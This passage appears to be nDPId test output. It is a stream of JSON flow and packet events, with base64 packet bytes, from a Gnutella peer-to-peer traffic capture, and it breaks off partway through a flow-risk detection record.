-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":90742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90742,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0VAAIAGinsKAAIPvD00t8R8LkyIWpaCAAAAAIAC+vBldgAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90743,"flow_last_seen":90743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90743,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":90743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90743,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0oEFAAIAGwA4KAAIPV3s26sR903KojXlgAAAAAIAC+vAfzQAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90743,"flow_last_seen":90743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90743,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":90743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90743,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03P1AAIAGv8gKAAIPS0AGr8R+EocndMkvAAAAAIAC+vBOeAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":839,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+\/xAAIAGUGkKAAIPWHhJ18R\/X\/Jjsy0QAAAAAIAC+vAQjAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03DVAAIAGmm4KAAIPVagiacSAm+Tx8HlYAAAAAIAC+vAkUQAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0MiRAAIAGHAkKAAIPXjZCUsSB+JU5M3UyAAAAAIAC+vBcCwAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90744,"flow_last_seen":90744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90744,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":90744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90744,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uGpAAIAGyAkKAAIP3O6RUsSCgvcQKi\/TAAAAAIAC+vByWAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GLNAAIAGdYoKAAIPsGOwFMSDGMp5VHLfAAAAAIAC+vA+FwAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0golAAIAGq4MKAAIPwSX\/gsSE8LC\/3xvGAAAAAIAC+vAWjQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xU1AAIAGu7QKAAIPPPEwwsSFUzVU0GEOAAAAAIAC+vAsxAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0O4FAAIAGzRQKAAIPTG6ZscSGnFbyaQhuAAAAAIAC+vAmPAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":847,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0zKVAAIAG6UMKAAIPlRyjr8SHwyS+2ZeIAAAAAIAC+vBRNgAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":848,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90745,"flow_last_seen":90745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90745,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":90745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90745,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Bk5AAIAG0n4KAAIPaO6s+sSIW\/wAgZpOAAAAAIAC+vCW0wAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BGFAAIAGRVEKAAIPYEFEwsSJipmyoW1hAAAAAIAC+vBT5wAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw5AAIAGft8KAAIPUAf8wMSKGugAPu54AAAAAIAC+vBNHwAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0e4RAAIAGraEKAAIPLR+YcMSLaOPXzV5xAAAAAIAC+vA+0wAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xktAAIAG9NcKAAIPjoSlDcSMd2bhikpDAAAAAIAC+vDMvQAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xP1AAIAGoVMKAAIPvKXLvsSNVetyIY5LAAAAAIAC+vDExgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Yo9AAIAGTC8KAAIPwSB+1sSO6MzJTpedAAAAAIAC+vAZ0gAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0OINAAIAGsckKAAIPubtKrcSP0PGcxJ9SAAAAAIAC+vCSDwAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SsxAAIAGLMcKAAIPwqO0fsSQKkliYWFkAAAAAIAC+vA+TwAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Ar9AAIAGpjAKAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ptBAAIAGmUcKAAIPpIQKGcSS2AZOgZ\/9AAAAAIAC+vAuWwAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eN9AAIAGqLsKAAIPM0SZ1sSTZo3Cj79BAAAAAIAC+vDuAwAAAgQFtAEDAwgBAQQC"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":90760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90760,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0kAAEAGeoC8PTS3CgACDy5MxHwAp\/gBiFqWg2AS\/\/+QwwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":90760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90760,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoc0ZAAIAGioYKAAIPvD00t8R8LkyIWpaDAKf4AlAQ+vCtjwAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 